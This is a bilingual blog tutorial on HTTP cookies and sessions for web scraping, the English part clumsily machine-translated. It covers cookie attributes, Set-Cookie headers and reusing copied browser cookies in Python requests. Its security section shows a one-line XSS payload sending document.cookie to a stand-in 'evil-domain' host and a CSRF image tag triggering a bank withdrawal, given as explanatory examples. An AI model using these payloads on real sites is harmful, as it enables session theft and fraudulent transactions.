Cookie origin and development

Previous We are talking about Youku barrage reptiles, when the introduction of a new knowledge: Cookie , because of space limitations at that time simply to introduce a bit of its role, and today we take a comprehensive look at Cookie (cookies ) and the associated knowledge!

I believe that many students must have heard Cookie this thing, probably also understand their role, but it works and how to set up, students may not have done web is not very clear, we will take you gentlemen today to learn more about the relevant knowledge under Cookie!

First, the background of the birth

The first chapter reptile tutorial series: HTTP Detailed we would have said five characteristics of HTTP, and one of which is: Stateless

Stateless HTTP: server can not know whether the two requests from the same browser, that server does not know what to do once on the user, each request is completely independent of each other.

Early Internet browsing but for the simple document information, see the yellow leaves, portals and so on, and did not interact with this statement. But with the slow development of the Internet, broadband, servers and other hardware facilities have been greatly improved, the Internet allows people to do more things, so interactive Web slowly rise, while the characteristics of HTTP stateless but serious obstacle to their development !

Interactive Web: client and server can interact, such as user logins, purchases, and so on various forums

It can not be recorded on the user's time to do something, how to do? Clever programmers began to think: how can we record the last operation on the user information it? So some people think of the hidden field .

Hidden fields wording:<input type="hidden" name="field_name" value="value">

In this way the last operation on the user input form recorded on the form, the form submission will not know the last time a user's operation of such a request, but that each had to create a hidden field and was assigned too cumbersome and error-prone!

ps: the role of powerful hidden field, today there are a lot of people use it to solve problems!

Netscape was an employee of Lou Montulli (Lu - Monterey), in 1994 the concept of "cookies" are used in network communications, to solve cart to shop online history , and was the most powerful browser It Netscape browser, Netscape browser with the support of other browsers has gradually begun to support Cookie, to all current browsers support a Cookie.
Here Insert Picture Description

Earlier we already know that in order to solve the birth Cookie characteristic HTTP stateless unable to meet interactive Web , and that it what is it?
Here Insert Picture Description
The figure is the Baidu home page Cookies (Cookie plural form) in Chrome browser, in the table, each row represents a Cookie, so let's look at the definition of Cookie Bar!

Cookie is sent to the client server specific information, but this information in a text file stored in the client , then each time the client sends a request to the server will bring these special information, for recording a client server status.

Cookie mainly for the following three aspects:

  1. Session state management (such as user login status, cart, game scores or other information to be recorded)
  2. Personalized settings (such as user-defined settings, themes, etc.)
  3. Browser behavior tracking (such as tracking user behavior analysis, etc.)

We understand the special Cookie information stored in the browser is sent by the server, that is how a specific process it? In order to facilitate the understanding of everyone, gentlemen Take user login as an example for everyone painted a schematic Cookie
Here Insert Picture Description

After the user inputs a user name and password, the browser user name and password to the server, for authentication server, user authentication after passing the encrypted encapsulated Cookie request header is placed back to the browser .

HTTP/1.1 200 OK
Content-type: text/html
Set-Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg; Expires=Tue, 15 Aug 2019 21:47:38 GMT; Path=/; Domain=.169it.com; HttpOnly

[响应体]

浏览器收到服务器返回数据,发现请求头中有一个:Set-Cookie,然后它就把这个Cookie保存起来,下次浏览器再请求服务器的时候,会把Cookie也放在请求头中传给服务器:

GET /sample_page.html HTTP/1.1
Host: www.example.org
Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg

服务器收到请求后从请求头中拿到cookie,然后解析并到用户信息,说明此用户已登录,Cookie是将数据保存在客户端的

这里我们可以看到,用户信息是保存在Cookie中,也就相当于是保存在浏览器中,那就说用户可以随意修改用户信息,这是一种不安全的策略!

强调一点:Cookie无论是服务器发给浏览器还是浏览器发给服务器,都是放在请求头中的!

下图中我们可以看到一个Cookie有:Name、Value、Domain、Path、Expires/Max-Age、Size、HTTP、Secure这些属性,那这些属性分别都有什么作用呢?我们来看看
Here Insert Picture Description

1. Name&Value

Name表示Cookie的名称,服务器就是通过name属性来获取某个Cookie值。

Value表示Cookie 的值,大多数情况下服务器会把这个value当作一个key去缓存中查询保存的数据。

2.Domain&Path

Domain表示可以访问此cookie的域名,下图我们以百度贴吧页的Cookie来讲解一下Domain属性。
Here Insert Picture Description
从上图中我们可以看出domain有:.baidu.com 顶级域名和.teiba.baidu.com的二级域名,所以这里就会有一个访问规则:顶级域名只能设置或访问顶级域名的Cookie,二级及以下的域名只能访问或设置自身或者顶级域名的Cookie,所以如果要在多个二级域名中共享Cookie的话,只能将Domain属性设置为顶级域名!

Path表示可以访问此cookie的页面路径。 比如path=/test,那么只有/test路径下的页面可以读取此cookie。

3.Expires/Max-Age

Expires/Max-Age表示此cookie超时时间。若设置其值为一个时间,那么当到达此时间后,此cookie失效。不设置的话默认值是Session,意思是cookie会和session一起失效。当浏览器关闭(不是浏览器标签页,而是整个浏览器) 后,此cookie失效。

提示:当Cookie的过期时间被设定时,设定的日期和时间只与客户端相关,而不是服务端。

4.Size

Size表示Cookie的name+value的字符数,比如又一个Cookie:id=666,那么Size=2+3=5 。

另外每个浏览器对Cookie的支持都不相同
Here Insert Picture Description

5.HTTP

HTTP表示cookie的httponly属性。若此属性为true,则只有在http请求头中会带有此cookie的信息,而不能通过document.cookie来访问此cookie。
Here Insert Picture Description
设计该特征意在提供一个安全措施来帮助阻止通过Javascript发起的跨站脚本攻击(XSS)窃取cookie的行为

6.Secure

Secure表示是否只能通过https来传递此条cookie。不像其它选项,该选项只是一个标记并且没有其它的值。
Here Insert Picture Description

这种cookie的内容意指具有很高的价值并且可能潜在的被破解以纯文本形式传输。

前面我们说过Cookie是由服务端生成的,那如何用Python代码来生成呢?
Here Insert Picture Description
从上图登录代码中我们看到,在简单的验证用户名和密码之后,服务器跳转到/user,然后set了一个cookie,浏览器收到响应后发现请求头中有一个:Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg,然后浏览器就会将这个Cookie保存起来!

最近我们一直在讲requests模块,这里我们就用requests模块来获取Cookie。
Here Insert Picture Description
r.cookies表示获取所有cookie,get_dict()函数表示返回的是字典格式cookie。

上篇我们爬取优酷弹幕的文章中便是用了requests模块设置Cookie
Here Insert Picture Description
我们就浏览器复制过来的Cookie放在代码中,这样便可以顺利的伪装成浏览器,然后正常爬取数据,复制Cookie是爬虫中常用的一种手段!

六、Session

1.诞生背景

其实在Cookie设计之初,并不像猪哥讲的那样Cookie只保存一个key,而是直接保存用户信息,刚开始大家认为这样用起来很爽,但是由于cookie 是存在用户端,而且它本身存储的尺寸大小也有限,最关键是用户可以是可见的,并可以随意的修改,很不安全。那如何又要安全,又可以方便的全局读取信息呢?于是,这个时候,一种新的存储会话机制:Session 诞生了。

2.Session是什么

Session翻译为会话,服务器为每个浏览器创建的一个会话对象,浏览器在第一次请求服务器,服务器便会为这个浏览器生成一个Session对象,保存在服务端,并且把Session的Id以cookie的形式发送给客户端浏览,而以用户显式结束或session超时为结束。

我们来看看Session工作原理:

  1. 当一个用户向服务器发送第一个请求时,服务器为其建立一个session,并为此session创建一个标识号(sessionID)。
  2. 这个用户随后的所有请求都应包括这个标识号(sessionID)。服务器会校对这个标识号以判断请求属于哪个session。

对于session标识号(sessionID),有两种方式实现:Cookie和URL重写,猪哥就以Cookie的实现防水画一个Session原理图
Here Insert Picture Description
联系cookie原理图我们可以看到,Cookie是将数据直接保存在客户端,而Session是将数据保存在服务端,就安全性来讲Session更好!

3.Python操作Session

后面猪哥将会以登录的例子来讲解如何用Python代码操作Session

七、面试场景

  1. 都是为了实现客户端与服务端交互而产出
  2. Cookie是保存在客户端,缺点易伪造、不安全
  3. Session是保存在服务端,会消耗服务器资源
  4. Session实现有两种方式:Cookie和URL重写
  1. 会话劫持和XSS:在Web应用中,Cookie常用来标记用户或授权会话。因此,如果Web应用的Cookie被窃取,可能导致授权用户的会话受到攻击。常用的窃取Cookie的方法有利用社会工程学攻击和利用应用程序漏洞进行XSS攻击。(new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;HttpOnly类型的Cookie由于阻止了JavaScript对其的访问性而能在一定程度上缓解此类攻击。
  2. Cross-site request forgery (CSRF) : Wikipedia has given a good example of CSRF. For example, in a chat room or a picture of insecurity on the forum, it is actually a request to the server to send you the bank withdrawals are: <img src="http://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory">When you open this picture containing HTML page, if you have previously registered your bank Cookie account and still valid (no other verification step), your money in the bank is likely to be automatically transferred out. CSRF solutions are: hidden domain code to make sure the mechanism, short life cycle Cookie

Eight, summary

Today, as we explained the knowledge Cookie, and how to use the module requests the operating Cookie, finally raised about the way in which security issues there is a relationship with the Session Cookie and Cookie. I hope we can have a comprehensive understanding of the Cookie (cookies), so you will be very helpful in the future reptile learning!

Guess you like

Origin www.cnblogs.com/pig66/p/11202930.html